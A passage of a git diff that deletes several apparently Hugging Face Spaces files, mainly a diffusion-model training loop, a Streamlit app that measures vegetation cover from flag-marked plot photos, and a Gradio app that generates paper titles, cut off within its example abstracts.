- loss = loss + args.prior_loss_weight * prior_loss - else: - loss = F.mse_loss(noise_pred.float(), target.float(), reduction="mean") - - accelerator.backward(loss) - if accelerator.sync_gradients: - params_to_clip = ( - itertools.chain(unet.parameters(), text_encoder.parameters()) - if args.train_text_encoder - else unet.parameters() - ) - accelerator.clip_grad_norm_(params_to_clip, args.max_grad_norm) - optimizer.step() - lr_scheduler.step() - optimizer.zero_grad() - - # Checks if the accelerator has performed an optimization step behind the scenes - if accelerator.sync_gradients: - progress_bar.update(1) - global_step += 1 - - if global_step % args.checkpointing_steps == 0: - if accelerator.is_main_process: - save_path = os.path.join(args.output_dir, f"checkpoint-{global_step}") - accelerator.save_state(save_path) - logger.info(f"Saved state to {save_path}") - - logs = {"loss": loss.detach().item(), "lr": lr_scheduler.get_last_lr()[0]} - progress_bar.set_postfix(**logs) - accelerator.log(logs, step=global_step) - - if global_step >= args.max_train_steps: - break - - accelerator.wait_for_everyone() - - # Create the pipeline using using the trained modules and save it. - if accelerator.is_main_process: - pipeline = StableDiffusionPipeline.from_pretrained( - args.pretrained_model_name_or_path, - unet=accelerator.unwrap_model(unet), - text_encoder=accelerator.unwrap_model(text_encoder), - ) - pipeline.save_pretrained(args.output_dir) - - if args.push_to_hub: - upload_folder( - repo_id=repo_id, - folder_path=args.output_dir, - commit_message="End of training", - ignore_patterns=["step_*", "epoch_*"], - ) - - accelerator.end_training() - - -if __name__ == "__main__": - main() diff --git a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/src/diffusers/pipelines/consistency_models/__init__.py b/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/src/diffusers/pipelines/consistency_models/__init__.py deleted file mode 100644 index 83fd1341d82a4ec2e371f7b8ec3f112df624084b..0000000000000000000000000000000000000000 --- a/spaces/pablodawson/ldm3d-inpainting/diffuserslocal/src/diffusers/pipelines/consistency_models/__init__.py +++ /dev/null @@ -1,21 +0,0 @@ -from typing import TYPE_CHECKING - -from ...utils import ( - _LazyModule, -) - - -_import_structure = {"pipeline_consistency_models": ["ConsistencyModelPipeline"]} - -if TYPE_CHECKING: - from .pipeline_consistency_models import ConsistencyModelPipeline - -else: - import sys - - sys.modules[__name__] = _LazyModule( - __name__, - globals()["__file__"], - _import_structure, - module_spec=__spec__, - ) diff --git a/spaces/philschmid/furiosa-ai-ocr/README.md b/spaces/philschmid/furiosa-ai-ocr/README.md deleted file mode 100644 index af9010527fa5db2606ea1fb5a76321489473c7d8..0000000000000000000000000000000000000000 --- a/spaces/philschmid/furiosa-ai-ocr/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Furiosa Ai Ocr -emoji: 🦀 -colorFrom: blue -colorTo: pink -sdk: gradio -sdk_version: 3.16.2 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/phyloforfun/GreenSight/app.py b/spaces/phyloforfun/GreenSight/app.py deleted file mode 100644 index 9cd69bddc751ebcc4468eb228b960253e295be15..0000000000000000000000000000000000000000 --- a/spaces/phyloforfun/GreenSight/app.py +++ /dev/null @@ -1,619 +0,0 @@ -import os, math, csv, shutil, itertools -import streamlit as st -from streamlit_image_select import image_select -import cv2 -import numpy as np 
-from PIL import Image -import matplotlib.colors as mcolors -from io import BytesIO - - -MAX_GALLERY_IMAGES = 50 -GALLERY_IMAGE_SIZE = 128 -MIN_AREA = 10 - -class DirectoryManager: - def __init__(self, output_dir): - self.dir_output = output_dir - self.mask_flag = os.path.join(output_dir, "mask_flag") - self.mask_plant = os.path.join(output_dir, "mask_plant") - self.mask_plant_plot = os.path.join(output_dir, "mask_plant_plot") - self.plant_rgb = os.path.join(output_dir, "plant_rgb") - self.plot_rgb = os.path.join(output_dir, "plot_rgb") - self.plant_rgb_warp = os.path.join(output_dir, "plant_rgb_warp") - self.plant_mask_warp = os.path.join(output_dir, "plant_mask_warp") - self.data = os.path.join(output_dir, "data") - - def create_directories(self): - os.makedirs(self.dir_output, exist_ok=True) - os.makedirs(self.mask_flag, exist_ok=True) - os.makedirs(self.mask_plant, exist_ok=True) - os.makedirs(self.mask_plant_plot, exist_ok=True) - os.makedirs(self.plant_rgb, exist_ok=True) - os.makedirs(self.plot_rgb, exist_ok=True) - os.makedirs(self.plant_rgb_warp, exist_ok=True) - os.makedirs(self.plant_mask_warp, exist_ok=True) - os.makedirs(self.data, exist_ok=True) - - - -def hex_to_hsv_bounds(hex_color, sat_value, val_value): - # Convert RGB hex to color - rgb_color = mcolors.hex2color(hex_color) - hsv_color = mcolors.rgb_to_hsv(np.array(rgb_color).reshape(1, 1, 3)) - - # Adjust the saturation and value components based on user's input - hsv_color[0][0][1] = sat_value / 255.0 # Saturation - hsv_color[0][0][2] = val_value / 255.0 # Value - - hsv_bound = tuple((hsv_color * np.array([179, 255, 255])).astype(int)[0][0]) - - return hsv_bound - -def warp_image(img, vertices): - # Compute distances between the vertices to determine the size of the target square - distances = [np.linalg.norm(np.array(vertices[i]) - np.array(vertices[i+1])) for i in range(len(vertices)-1)] - distances.append(np.linalg.norm(np.array(vertices[-1]) - np.array(vertices[0]))) # Add the distance between the last and first point - max_distance = max(distances) - - # Define target vertices for the square - dst_vertices = np.array([ - [max_distance - 1, 0], - [0, 0], - [0, max_distance - 1], - [max_distance - 1, max_distance - 1] - ], dtype="float32") - - # Compute the perspective transform matrix using the provided vertices - matrix = cv2.getPerspectiveTransform(np.array(vertices, dtype="float32"), dst_vertices) - - # Warp the image to the square - warped_img = cv2.warpPerspective(img, matrix, (int(max_distance), int(max_distance))) - - return warped_img - -# Assuming get_points_from_contours is a function that takes a tuple of four contours -# and returns their respective centroid points as a list of tuples [(x1,y1), (x2,y2), (x3,y3), (x4,y4)] -def get_points_from_contours(contours): - centroids = [] - for contour in contours: - # Compute the centroid for the contour - M = cv2.moments(contour) - if M["m00"] != 0: - cX = int(M["m10"] / M["m00"]) - cY = int(M["m01"] / M["m00"]) - centroids.append((cX, cY)) - else: - # If the contour is a single point or line (which should not happen with flags), handle it here - pass - return centroids - -# Function to display the image with the selected quadrilateral superimposed -def display_image_with_quadrilateral(image, points): - # Make a copy of the image to draw on - overlay_image = image.copy() - - # Draw the quadrilateral - cv2.polylines(overlay_image, [np.array(points)], isClosed=True, color=(0, 255, 0), thickness=3) - - # Display the image with the quadrilateral - 
st.image(overlay_image, caption="Quadrilateral on Image", use_column_width='auto') - -# Function to update displayed quadrilateral based on selected index -def update_displayed_quadrilateral(index, point_combinations, base_image_path): - # Extract the four points of the current quadrilateral - quad_points = get_points_from_contours(point_combinations[index]) - - # Read the base image - base_image = cv2.imread(base_image_path) - - # If the image is not found, handle the error appropriately - if base_image is None: - st.error("Failed to load image.") - return - - # Display the image with the selected quadrilateral - display_image_with_quadrilateral(base_image, quad_points) - -def quadrilateral_area(centroids): - # Assuming centroids are in correct order (A, B, C, D) to form a quadrilateral - def distance(p1, p2): - return math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2) - - A, B, C, D = centroids - # Using Bretschneider's formula to calculate area of a quadrilateral - a = distance(A, B) - b = distance(B, C) - c = distance(C, D) - d = distance(D, A) - p = (a + b + c + d) / 2 # semi-perimeter - return math.sqrt((p - a) * (p - b) * (p - c) * (p - d)) - -def sort_permutations_by_area(valid_permutations): - # Calculate area for each permutation and return sorted list - perm_areas = [(perm, quadrilateral_area(get_points_from_contours(perm))) for perm in valid_permutations] - # Sort by area in descending order (largest first) - perm_areas.sort(key=lambda x: x[1], reverse=True) - # Return only the sorted permutations, not the areas - sorted_permutations = [perm for perm, area in perm_areas] - return sorted_permutations - -def is_valid_quadrilateral(centroids): - if len(centroids) != 4: - return False - - def ccw(A, B, C): - return (C[1] - A[1]) * (B[0] - A[0]) > (B[1] - A[1]) * (C[0] - A[0]) - - def intersect(A, B, C, D): - return ccw(A, C, D) != ccw(B, C, D) and ccw(A, B, C) != ccw(A, B, D) - - A, B, C, D = centroids - return not (intersect(A, B, C, D) or intersect(A, D, B, C)) - -def process_image(image_path, flag_lower, flag_upper, plant_lower, plant_upper, loc, file_name, file_exists, selected_img, headers, base_name): - with loc: - btn_back, btn_next = st.columns([2,2]) - - img = cv2.imread(image_path) - - # Check if image is valid - if img is None: - print(f"Error reading image from path: {image_path}") - return None, None, None, None, None, None, None, None, None, None - - hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV) # Convert image to HSV - - # Explicitly ensure bounds are integer tuples - flag_lower = tuple(int(x) for x in flag_lower) - flag_upper = tuple(int(x) for x in flag_upper) - plant_lower = tuple(int(x) for x in plant_lower) - plant_upper = tuple(int(x) for x in plant_upper) - - flag_mask = cv2.inRange(hsv_img, flag_lower, flag_upper) - plant_mask = cv2.inRange(hsv_img, plant_lower, plant_upper) - - # # Find contours - # contours, _ = cv2.findContours(flag_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) - - # # Sort contours by area and keep only the largest 4 - # sorted_contours = sorted(contours, key=cv2.contourArea, reverse=True)[:4] - - # # If there are not 4 largest contours, return - # if len(sorted_contours) != 4: - # return None, None, None, None, None, None, None, None, None, None - - - # Find contours - contours, _ = cv2.findContours(flag_mask, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) - - # Sort contours by area and keep a significant number, assuming noise has much smaller area - sorted_contours = sorted(contours, key=cv2.contourArea, reverse=True) - - # 
Filter out noise based on a predefined area threshold - significant_contours = [cnt for cnt in sorted_contours if cv2.contourArea(cnt) > MIN_AREA] - - # Logic to handle cases where there are more than 4 significant contours - centroids = [] - if len(significant_contours) < 4: - return None, None, None, None, None, None, None, None, None, None - elif len(significant_contours) > 4: - st.session_state['keep_quad'] = False - # while not st.session_state['keep_quad']: - with loc: - st.warning("Cycle until correct plot bounds are found") - # Create all possible combinations of four points - if len(significant_contours) >= 4: - # Generate all permutations of four points from the significant contours - permutations_of_four = list(itertools.permutations(significant_contours, 4)) - - # Filter out invalid quadrilaterals - valid_permutations0 = [perm for perm in permutations_of_four if is_valid_quadrilateral(get_points_from_contours(perm))] - - valid_permutations = sort_permutations_by_area(valid_permutations0) - - if not valid_permutations: - st.error("No valid quadrilaterals found.") - return None, None, None, None, None, None, None, None, None, None - - # Placeholder for quadrilateral indices - selected_quad_index = 0 - - # Function to update displayed quadrilateral based on selected index - def update_displayed_quadrilateral(index): - # Extract the four points of the current quadrilateral - centroids = get_points_from_contours(valid_permutations[index]) - return centroids - - # Show initial quadrilateral - centroids = update_displayed_quadrilateral(selected_quad_index) - - with btn_back: - # Button to go to the previous quadrilateral - if st.button('Previous'): - st.session_state.quad_index = (st.session_state.quad_index - 1) % len(valid_permutations) - centroids = update_displayed_quadrilateral(st.session_state.quad_index) - - with btn_next: - # Button to go to the next quadrilateral - if st.button('Next'): - st.session_state.quad_index = (st.session_state.quad_index + 1) % len(valid_permutations) - centroids = update_displayed_quadrilateral(st.session_state.quad_index) - - with loc: - if st.button('Keep Plot Bounds'): - st.session_state['keep_quad'] = True - if st.button('Save as Failure'): - st.session_state['keep_quad'] = True - # Append the data to the CSV file - with open(file_name, mode='a', newline='') as file: - writer = csv.writer(file) - - # If the file doesn't exist, write the headers - if not file_exists: - writer.writerow(headers) - - # Write the data - writer.writerow([f"{base_name}",f"NA", f"NA", f"NA"]) - - # Remove processed image from the list - st.session_state['input_list'].remove(selected_img) - st.rerun() - - # If there are exactly 4 largest contours, proceed with existing logic - elif len(significant_contours) == 4: - # Create a new mask with only the largest 4 contours - largest_4_flag_mask = np.zeros_like(flag_mask) - cv2.drawContours(largest_4_flag_mask, sorted_contours, -1, (255), thickness=cv2.FILLED) - - # Compute the centroid for each contour - for contour in sorted_contours: - M = cv2.moments(contour) - if M["m00"] != 0: - cx = int(M["m10"] / M["m00"]) - cy = int(M["m01"] / M["m00"]) - else: - cx, cy = 0, 0 - centroids.append((cx, cy)) - - # Compute the centroid of the centroids - centroid_x = sum(x for x, y in centroids) / 4 - centroid_y = sum(y for x, y in centroids) / 4 - - # Sort the centroids - centroids.sort(key=lambda point: (-math.atan2(point[1] - centroid_y, point[0] - centroid_x)) % (2 * np.pi)) - - if len(centroids) == 4: - # Create a polygon mask using 
the sorted centroids - poly_mask = np.zeros_like(flag_mask) - cv2.fillPoly(poly_mask, [np.array(centroids)], 255) - - # Mask the plant_mask with poly_mask - mask_plant_plot = cv2.bitwise_and(plant_mask, plant_mask, mask=poly_mask) - - # Count the number of black pixels inside the quadrilateral - total_pixels_in_quad = np.prod(poly_mask.shape) - white_pixels_in_quad = np.sum(poly_mask == 255) - black_pixels_in_quad = total_pixels_in_quad - white_pixels_in_quad - - # Extract the RGB pixels from the original image using the mask_plant_plot - plant_rgb = cv2.bitwise_and(img, img, mask=mask_plant_plot) - - # Draw the bounding quadrilateral - plot_rgb = plant_rgb.copy() - for i in range(4): - cv2.line(plot_rgb, centroids[i], centroids[(i+1)%4], (0, 0, 255), 3) - - # Convert the masks to RGB for visualization - flag_mask_rgb = cv2.cvtColor(flag_mask, cv2.COLOR_GRAY2RGB) - orange_color = [255, 165, 0] # RGB value for orange - flag_mask_rgb[np.any(flag_mask_rgb != [0, 0, 0], axis=-1)] = orange_color - - plant_mask_rgb = cv2.cvtColor(plant_mask, cv2.COLOR_GRAY2RGB) - mask_plant_plot_rgb = cv2.cvtColor(mask_plant_plot, cv2.COLOR_GRAY2RGB) - bright_green_color = [0, 255, 0] - plant_mask_rgb[np.any(plant_mask_rgb != [0, 0, 0], axis=-1)] = bright_green_color - mask_plant_plot_rgb[np.any(mask_plant_plot_rgb != [0, 0, 0], axis=-1)] = bright_green_color - - # Warp the images - plant_rgb_warp = warp_image(plant_rgb, centroids) - plant_mask_warp = warp_image(mask_plant_plot_rgb, centroids) - - return flag_mask_rgb, plant_mask_rgb, mask_plant_plot_rgb, plant_rgb, plot_rgb, plant_rgb_warp, plant_mask_warp, plant_mask, mask_plant_plot, black_pixels_in_quad - -def calculate_coverage(mask_plant_plot, plant_mask_warp, black_pixels_in_quad): - # Calculate the percentage of white pixels for mask_plant_plot - white_pixels_plot = np.sum(mask_plant_plot > 0) - total_pixels_plot = mask_plant_plot.size - plot_coverage = (white_pixels_plot / black_pixels_in_quad) * 100 - - # Convert plant_mask_warp to grayscale - plant_mask_warp_gray = cv2.cvtColor(plant_mask_warp, cv2.COLOR_BGR2GRAY) - - # Calculate the percentage of white pixels for plant_mask_warp - white_pixels_warp = np.sum(plant_mask_warp_gray > 0) - total_pixels_warp = plant_mask_warp_gray.size - warp_coverage = (white_pixels_warp / total_pixels_warp) * 100 - - # Calculate the area in cm^2 of the mask_plant_plot - # Given that the real-life size of the square is 2 square meters or 20000 cm^2 - plot_area_cm2 = (white_pixels_warp / total_pixels_warp) * 20000 - - return round(plot_coverage,2), round(warp_coverage,2), round(plot_area_cm2,2) - -def get_color_parameters(): - # Color pickers for hue component - FL, FL_S, FL_SS = st.columns([2,4,4]) - with FL: - flag_lower_hex = st.color_picker("Flag Color Lower Bound Hue", "#33211f") - with FL_S: - flag_lower_sat = st.slider("Flag Lower Bound Saturation", 0, 255, 120) - with FL_SS: - flag_lower_val = st.slider("Flag Lower Bound Value", 0, 255, 150) - - FU, FU_S, FU_SS = st.columns([2,4,4]) - with FU: - flag_upper_hex = st.color_picker("Flag Color Upper Bound Hue", "#ff7700") - with FU_S: - flag_upper_sat = st.slider("Flag Upper Bound Saturation", 0, 255, 255) - with FU_SS: - flag_upper_val = st.slider("Flag Upper Bound Value", 0, 255, 255) - - PL, PL_S, PL_SS = st.columns([2,4,4]) - with PL: - plant_lower_hex = st.color_picker("Plant Color Lower Bound Hue", "#504F49") - with PL_S: - plant_lower_sat = st.slider("Plant Lower Bound Saturation", 0, 255, 30) - with PL_SS: - plant_lower_val = st.slider("Plant Lower Bound 
Value", 0, 255, 30) - - PU, PU_S, PU_SS = st.columns([2,4,4]) - with PU: - plant_upper_hex = st.color_picker("Plant Color Upper Bound Hue", "#00CFFF") - with PU_S: - plant_upper_sat = st.slider("Plant Upper Bound Saturation", 0, 255, 255) - with PU_SS: - plant_upper_val = st.slider("Plant Upper Bound Value", 0, 255, 255) - - # Get HSV bounds using the modified function - flag_lower_bound = hex_to_hsv_bounds(flag_lower_hex, flag_lower_sat, flag_lower_val) - flag_upper_bound = hex_to_hsv_bounds(flag_upper_hex, flag_upper_sat, flag_upper_val) - plant_lower_bound = hex_to_hsv_bounds(plant_lower_hex, plant_lower_sat, plant_lower_val) - plant_upper_bound = hex_to_hsv_bounds(plant_upper_hex, plant_upper_sat, plant_upper_val) - - return flag_lower_bound, flag_upper_bound, plant_lower_bound, plant_upper_bound - -def save_img(directory, base_name, mask): - mask_name = os.path.join(directory, os.path.basename(base_name)) - cv2.imwrite(mask_name, mask) - -def validate_dir(dir): - if not os.path.exists(dir): - os.makedirs(dir, exist_ok=True) - -def make_zipfile(source_dir, output_filename): - shutil.make_archive(output_filename, 'zip', source_dir) - return output_filename + '.zip' - -def save_uploaded_file(directory, img_file, image=None): - if not os.path.exists(directory): - os.makedirs(directory) - # Assuming the uploaded file is an image - if image is None: - with Image.open(img_file) as image: - full_path = os.path.join(directory, img_file.name) - image.save(full_path, "JPEG") - # Return the full path of the saved image - return full_path - else: - full_path = os.path.join(directory, img_file.name) - image.save(full_path, "JPEG") - return full_path - -def create_download_button(dir_to_zip, zip_filename): - zip_filepath = make_zipfile(dir_to_zip, zip_filename) - with open(zip_filepath, 'rb') as f: - bytes_io = BytesIO(f.read()) - st.download_button( - label=f"Download Results for{st.session_state['processing_add_on']}",type='primary', - data=bytes_io, - file_name=os.path.basename(zip_filepath), - mime='application/zip' - ) - -def delete_directory(dir_path): - try: - shutil.rmtree(dir_path) - st.session_state['input_list'] = [] - st.session_state['input_list_small'] = [] - # st.success(f"Deleted previously uploaded images, making room for new images: {dir_path}") - except OSError as e: - st.error(f"Error: {dir_path} : {e.strerror}") - -def clear_image_gallery(): - delete_directory(st.session_state['dir_uploaded_images']) - delete_directory(st.session_state['dir_uploaded_images_small']) - validate_dir(st.session_state['dir_uploaded_images']) - validate_dir(st.session_state['dir_uploaded_images_small']) - -def reset_demo_images(): - st.session_state['dir_input'] = os.path.join(st.session_state['dir_home'],"demo") - st.session_state['input_list'] = [os.path.join(st.session_state['dir_input'], fname) for fname in os.listdir(st.session_state['dir_input']) if fname.endswith(('.jpg', '.jpeg', '.png'))] - n_images = len([f for f in os.listdir(st.session_state['dir_input']) if os.path.isfile(os.path.join(st.session_state['dir_input'], f))]) - st.session_state['processing_add_on'] = f" {n_images} Images" - st.session_state['uploader_idk'] += 1 - -def main(): - _, R_coverage, R_plot_area_cm2, R_save = st.columns([5,2,2,2]) - img_gallery, img_main, img_seg, img_green, img_warp = st.columns([1,4,2,2,2]) - - st.session_state['dir_uploaded_images'] = os.path.join(st.session_state['dir_home'],'uploads') - st.session_state['dir_uploaded_images_small'] = os.path.join(st.session_state['dir_home'],'uploads_small') - 
uploaded_files = st.file_uploader("Upload Images", type=['jpg', 'jpeg'], accept_multiple_files=True, key=st.session_state['uploader_idk']) - if uploaded_files: - # Clear input image gallery and input list - clear_image_gallery() - - # Process the new iamges - for uploaded_file in uploaded_files: - file_path = save_uploaded_file(st.session_state['dir_uploaded_images'], uploaded_file) - st.session_state['input_list'].append(file_path) - - img = Image.open(file_path) - img.thumbnail((GALLERY_IMAGE_SIZE, GALLERY_IMAGE_SIZE), Image.Resampling.LANCZOS) - file_path_small = save_uploaded_file(st.session_state['dir_uploaded_images_small'], uploaded_file, img) - st.session_state['input_list_small'].append(file_path_small) - print(uploaded_file.name) - - # Set the local images to the uploaded images - st.session_state['dir_input'] = st.session_state['dir_uploaded_images'] - - st.session_state['input_list'] = [os.path.join(st.session_state['dir_input'], fname) for fname in os.listdir(st.session_state['dir_input']) if fname.endswith(('.jpg', '.jpeg', '.png'))] - - n_images = len([f for f in os.listdir(st.session_state['dir_input']) if os.path.isfile(os.path.join(st.session_state['dir_input'], f))]) - st.session_state['processing_add_on'] = f" {n_images} Images" - uploaded_files = None - st.session_state['uploader_idk'] += 1 - st.info(f"Processing **{n_images}** images from {st.session_state['dir_input']}") - - if st.session_state['dir_input'] is None: - reset_demo_images() - - # dir_input = st.text_input("Input directory for images:", value=os.path.join(st.session_state['dir_home'],"demo")) - dir_output = os.path.join(st.session_state['dir_home'],"demo_out") # st.text_input("Output directory:", value=os.path.join(st.session_state['dir_home'],"demo_out")) - - directory_manager = DirectoryManager(dir_output) - directory_manager.create_directories() - - run_name = st.text_input("Run name:", value="test") - file_name = os.path.join(directory_manager.data, f"{run_name}.csv") - headers = ['image',"plant_coverage_uncorrected_percen", "plant_coverage_corrected_percent", "plant_area_corrected_cm2"] - file_exists = os.path.isfile(file_name) - st.button("Reset Demo Images", on_click=reset_demo_images) - - - if len(st.session_state['input_list']) == 0 or st.session_state['input_list'] is None: - st.balloons() - create_download_button(dir_output, run_name) - - else: - with img_gallery: - selected_img = image_select("Select an image", st.session_state['input_list'], use_container_width=False) - base_name = os.path.basename(selected_img) - create_download_button(dir_output, run_name) - - if selected_img: - - selected_img_view = Image.open(selected_img) - with img_main: - st.image(selected_img_view, caption="Selected Image", use_column_width='auto') - - flag_lower_bound, flag_upper_bound, plant_lower_bound, plant_upper_bound = get_color_parameters() - - flag_mask, plant_mask, mask_plant_plot, plant_rgb, plot_rgb, plant_rgb_warp, plant_mask_warp, plant_mask_bi, mask_plant_plot_bi, black_pixels_in_quad = process_image(selected_img, flag_lower_bound, flag_upper_bound, plant_lower_bound, plant_upper_bound, R_save, file_name, file_exists, selected_img, headers, base_name) - - if plant_mask_warp is not None: - plot_coverage, warp_coverage, plot_area_cm2 = calculate_coverage(mask_plant_plot_bi, plant_mask_warp, black_pixels_in_quad) - - with R_coverage: - st.markdown(f"Uncorrected Plant Coverage: {plot_coverage}%") - with R_plot_area_cm2: - st.markdown(f"Corrected Plant Coverage: {warp_coverage}%") - st.markdown(f"Corrected 
Plant Area: {plot_area_cm2}cm2") - - # Display masks in galleries - with img_seg: - st.image(plant_mask, caption="Plant Mask", use_column_width=True) - st.image(flag_mask, caption="Flag Mask", use_column_width=True) - with img_green: - st.image(mask_plant_plot, caption="Plant Mask Inside Plot", use_column_width=True) - st.image(plant_rgb, caption="Plant Material", use_column_width=True) - with img_warp: - st.image(plot_rgb, caption="Plant Material Inside Plot", use_column_width=True) - st.image(plant_rgb_warp, caption="Plant Mask Inside Plot Warped to Square", use_column_width=True) - # st.image(plot_rgb_warp, caption="Flag Mask", use_column_width=True) - with R_save: - st.write(f"Showing plot outline #{st.session_state.quad_index}") - if st.button('Save'): - # Save the masks to their respective folders - save_img(directory_manager.mask_flag, base_name, flag_mask) - save_img(directory_manager.mask_plant, base_name, plant_mask) - save_img(directory_manager.mask_plant_plot, base_name, mask_plant_plot) - save_img(directory_manager.plant_rgb, base_name, plant_rgb) - save_img(directory_manager.plot_rgb, base_name, plot_rgb) - save_img(directory_manager.plant_rgb_warp, base_name, plant_rgb_warp) - save_img(directory_manager.plant_mask_warp, base_name, plant_mask_warp) - - # Append the data to the CSV file - with open(file_name, mode='a', newline='') as file: - writer = csv.writer(file) - - # If the file doesn't exist, write the headers - if not file_exists: - writer.writerow(headers) - - # Write the data - writer.writerow([f"{base_name}",f"{plot_coverage}", f"{warp_coverage}", f"{plot_area_cm2}"]) - - # Remove processed image from the list - st.session_state['input_list'].remove(selected_img) - st.session_state['quad_index'] = 0 - st.rerun() - else: - with R_save: - if st.button('Save as Failure'): - # Append the data to the CSV file - with open(file_name, mode='a', newline='') as file: - writer = csv.writer(file) - - # If the file doesn't exist, write the headers - if not file_exists: - writer.writerow(headers) - - # Write the data - writer.writerow([f"{base_name}",f"NA", f"NA", f"NA"]) - - # Remove processed image from the list - st.session_state['input_list'].remove(selected_img) - st.session_state['quad_index'] = 0 - st.rerun() - - -st.set_page_config(layout="wide", page_title='GreenSight') - -if 'dir_home' not in st.session_state: - st.session_state['dir_home'] = os.path.dirname(__file__) - -if 'dir_input' not in st.session_state: - st.session_state['dir_input'] = None - -if 'processing_add_on' not in st.session_state: - st.session_state['processing_add_on'] = ' 1 Image' - -if 'uploader_idk' not in st.session_state: - st.session_state['uploader_idk'] = 1 - -if 'input_list' not in st.session_state: - st.session_state['input_list'] = [] - -if 'input_list_small' not in st.session_state: - st.session_state['input_list_small'] = [] - -if 'dir_uploaded_images' not in st.session_state: - st.session_state['dir_uploaded_images'] = os.path.join(st.session_state['dir_home'],'uploads') - validate_dir(os.path.join(st.session_state['dir_home'],'uploads')) - -if 'dir_uploaded_images_small' not in st.session_state: - st.session_state['dir_uploaded_images_small'] = os.path.join(st.session_state['dir_home'],'uploads_small') - validate_dir(os.path.join(st.session_state['dir_home'],'uploads_small')) - -if 'keep_quad' not in st.session_state: - st.session_state['keep_quad'] = False - -if 'quad_index' not in st.session_state: - st.session_state['quad_index'] = 0 - -st.title("GreenSight") -st.write("Simple color 
segmentation app to estimate the vegetation coverage in a plot. Corners of the plot need to be marked with solid, uniforly colored flags.") -st.write("If you exit the session before completing the segmentation of all images, all progress will be lost!") -main() diff --git a/spaces/pietrocagnasso/paper-title-generation/app.py b/spaces/pietrocagnasso/paper-title-generation/app.py deleted file mode 100644 index 8a3cb8dcdccf3ec79421584ec721b334cba77ff4..0000000000000000000000000000000000000000 --- a/spaces/pietrocagnasso/paper-title-generation/app.py +++ /dev/null @@ -1,42 +0,0 @@ -import gradio as gr -from TitleGenerator import SmallTitleGenerator -from transformers import AutoTokenizer - -tokenizer = AutoTokenizer.from_pretrained("pietrocagnasso/bart-paper-titles") - - -def generate(text): - type = text.split(":")[0] - text2 = ":".join(text.split(":")[1:]) - if type == "CS": - tg = SmallTitleGenerator(model_name="pietrocagnasso/bart-paper-titles-cs") - result = tg.generate_title_on_spot(text2) - elif type == "AI": - tg = SmallTitleGenerator(model_name="pietrocagnasso/bart-paper-titles-ai") - result = tg.generate_title_on_spot(text2) - elif type == "BIO": - tg = SmallTitleGenerator(model_name="pietrocagnasso/bart-paper-titles-bio") - result = tg.generate_title_on_spot(text2) - else: - tg = SmallTitleGenerator(model_name="pietrocagnasso/bart-paper-titles") - result = tg.generate_title_on_spot(text) - - return result - - -examples = [ - ["CS: Evaluation of on-road bicycle design was performed using surface EMG on 12 male volunteers. Three types of bicycle design, i.e., rigid frame, suspension and sports were studied. Bicycles with suspension were found to have lesser rider muscle fatigue. Bicycling posture leads to considerable discomfort and a variety of chronic injuries. This necessitates a proper bicycle design to avoid injuries and thereby enhance rider comfort. The objective of this study was to investigate the muscle activity during cycling on three different bicycle designs, i.e., rigid frame (RF), suspension (SU) and sports (SP) using surface electromyography (sEMG). Twelve male volunteers participated in this study. sEMG signals were acquired bilaterally from extensor carpi radialis (ECR), trapezius medial (TM), latissimus dorsi medial (LDM) and erector spinae (ES), during 30\u00a0min of cycling on each bicycle and after cycling. Time domain (RMS) and frequency domain (MPF) parameters were extracted from acquired sEMG signals. From the sEMG study, it was found that the fatigue in right LDM and ES were significantly (p\u00a0<\u00a00.05) higher in SP bicycle. This was corroborated by a psychophysical assessment based on RBG pain scale. The study also showed that there was a significantly lesser fatigue with the SU bicycle than the RF and SP bicycles. "], - ["AI: An autonomous system should act ethically, but what if it has no all-ethical choice? We model how to rank states violating multiple instances of ethical principles. We enable an autonomous system to use this ethic rank to rank its available plans. We guarantee that when a plan is chosen, it is the most ethical plan available. Autonomous systems such as unmanned vehicles are beginning to operate within society. All participants in society are required to follow specific regulations and laws. An autonomous system cannot be an exception. Inevitably an autonomous system will find itself in a situation in which it needs to not only choose to obey a rule or not, but also make a complex ethical decision. 
However, there exists no obvious way to implement the human understanding of ethical behaviour in computers. Even if we enable autonomous systems to distinguish between more and less ethical alternatives, how can we be sure that they would choose right? We consider autonomous systems with a hybrid architecture in which the highest level of reasoning is executed by a rational (BDI) agent. For such a system, formal verification has been used successfully to prove that specific rules of behaviour are observed when making decisions. We propose a theoretical framework for ethical plan selection that can be formally verified. We implement a rational agent that incorporates a given ethical policy in its plan selection and show that we can formally verify that the agent chooses to execute, to the best of its beliefs, the most ethical available plan. "], - ["BIO: It has been hypothesized that calcifying fibrous tumoris the late regressive stage of inflammatory myofibroblastic tumor. By genome-wide methylation assay we could provide evidence that these lesions are a spectrum of one entity The well-known fusion genes ALK, ROS1 and RET, a hallmark of IMT, were not find in our CFT. Based on histological findings, calcifying fibrous tumor (CFT) may be a late (burned out) stage of inflammatory myofibroblastic tumor (IMT). This concept, however, has not been proven by molecular means.\n Five CFTs were analyzed for IMT-related rearrangements in ALK, ROS1 and RET using fluorescence in situ hybridization (FISH). Additionally, genome-wide methylation patterns were investigated and compared with IMT (n\u202f=\u202f7), leiomyoma (n\u202f=\u202f7), angioleiomyoma (n\u202f=\u202f9), myopericytoma (n\u202f=\u202f7) and reactive soft tissue lesions (n\u202f=\u202f10) using unsupervised hierarchical cluster analysis and t distributed stochastic neighbor embedding.\n CFT patients, 4 females and 1 male, had a median age of 20\u202fyears ranging from 7 to 43\u202fyears. Two patients were younger than 18\u202fyears old. The tumors originated in the abdomen (n\u202f=\u202f4) and axilla (n\u202f=\u202f1). Histologically, all lesions were (multi) nodular and hypocellular consisting of bland looking (myo)fibroblasts embedded in a collagenous matrix with calcifications.\n FISH analysis brought up negative results for ALK, RET and ROS1 rearrangements. However, genome-wide methylation analysis revealed overlapping methylation patterns of CFT and IMT forming a distinct homogeneous methylation cluster with exception of one case clustering with myopericytoma/angioleiomyoma.\n In conclusion, DNA methylation profiling supports the concept that CFT and IMT represent both ends of a spectrum of one entity with CFT being the burn out stage of IMT."], - [" We propose a novel Transformer-based Highlights Extractor (THExt, in short). We achieve performance superior to state-of-the-art highlights extraction methods on three benchmark datasets. 